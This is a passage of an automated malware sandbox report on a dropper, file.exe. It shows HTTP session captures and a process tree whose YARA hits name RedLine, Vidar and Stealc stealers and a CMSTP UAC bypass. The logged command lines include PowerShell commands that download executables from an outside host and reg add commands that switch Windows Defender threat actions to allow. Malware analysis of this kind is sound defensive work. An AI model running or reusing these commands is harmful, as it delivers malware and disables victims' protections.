2024-04-26 15:12:49 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGO6Ir7EGIjBbMe3eQAtuCL3jg7g0TShqEj30UCC7_atPViR7K19ZkkguPUrDHWkhEYx3h598qBoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:12:50 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 15:12:50 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3114 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:50 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 15:12:50 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 49 46 34 35 32 51 35 75 78 6a 4b 45 65 37 31 6c 6f 36 70 30 48 73 53 65 68 49 56 78 74 33 38 72 63 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="IF452Q5uxjKEe71lo6p0HsSehIVxt38rc
2024-04-26 15:12:50 UTC	960	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49795	142.250.189.132	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:50 UTC	868	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGO6Ir7EGIjAT31A6jm3jiUbYeNNo7BDZAsX_AO4Yhqat1pygOlLCpUVzhhDggamCbrUDp4EqjUUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCLnKzQEI+cDUFRiPzs0BGNiGzgEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-15; NID=513=mBpMdDuQUM098tgF-RftvJu-NPK7YfkE1CPzJF3NXnIlIFlqe9p8_ks2w5ygwrjY1WWUtQ0sj4xfJdVG3EL4CrGCzMBS9zlp7BKlEtOgW2LY1r1aYd6PiBvNiGDdaJI1Yyc2ErHauJmI6J0-6N6lH-tLw47o3FA5_-6KNrSKYXU
2024-04-26 15:12:50 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 15:12:50 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3186 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:50 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-26 15:12:50 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 78 63 35 67 4f 6b 4b 5a 6f Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="xc5gOkKZo
2024-04-26 15:12:50 UTC	1032	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Target ID:	0
Start time:	17:10:51
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	50'907 bytes
MD5 hash:	705685A8DEACE858E7FC849471C045F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:10:52
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:10:52
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:10:52
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:10:56
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:10:59
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\i1.exe
Wow64 process (32bit):	true
Commandline:	i1.exe /SUB=2838 /str=one
Imagebase:	0x400000
File size:	452'609 bytes
MD5 hash:	22B610EEDBB3591F31508E1912ED5B01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000003.2342660108.00000000070AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:11:00
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:11:06
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u2xs.0.exe"
Imagebase:	0x400000
File size:	305'152 bytes
MD5 hash:	BE531DFDB40E97826D86E1FB73FA73C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2983285998.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:11:11
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:11:20
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
Imagebase:	0xc60000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:11:21
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\i3.exe
Wow64 process (32bit):	true
Commandline:	i3.exe
Imagebase:	0x400000
File size:	6'655'374 bytes
MD5 hash:	DA30CEE1E6389704275CA7868FC7AD1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	17:11:21
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:11:21
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	17:11:24
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u2xs.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u2xs.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000F.00000000.2324296887.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:11:26
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	.\Install.exe /Bdidlg "385128" /S
Imagebase:	0x790000
File size:	6'749'184 bytes
MD5 hash:	90487EB500021DBCB9443A2CF972A204
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs Detection: 31%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	17:11:26
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	17:11:26
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:11:26
Start date:	26/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	17:11:26
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808
Imagebase:	0xe50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	17:11:27
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	17:11:27
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	17:11:29
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1936
Imagebase:	0xe50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	17:11:30
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	17:11:30
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	17:11:30
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	17:11:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	17:11:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
